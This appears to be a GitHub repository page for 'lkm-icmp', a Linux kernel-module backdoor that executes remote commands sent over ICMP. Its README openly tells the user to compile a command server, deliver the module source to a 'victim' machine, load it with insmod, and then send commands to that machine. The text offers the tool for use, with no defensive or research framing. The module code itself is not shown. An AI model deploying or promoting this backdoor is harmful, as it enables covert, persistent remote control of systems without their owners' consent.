Skip to content

ferreiraklet/lkm-icmp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

lkm-icmp

LKM ICMP is a linux kernel module conversion of my previous icmp backdoor made in C, this module provides a lkm backdoor that execute remote commands.

Usage

First, you need to compile the server to send commands to victim

gcc server.c -o server -pthread

After you have the server, you need to delivery icmpbackdoor.c and Makefile to victim.

In victim machine

ls
icmpbackdoor.c Makefile

make ; insmod icmpbackdoor.ko

Now, to execute commands in victim, use the server

./server <target-ip>
# cmd
echo test > /tmp/test

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published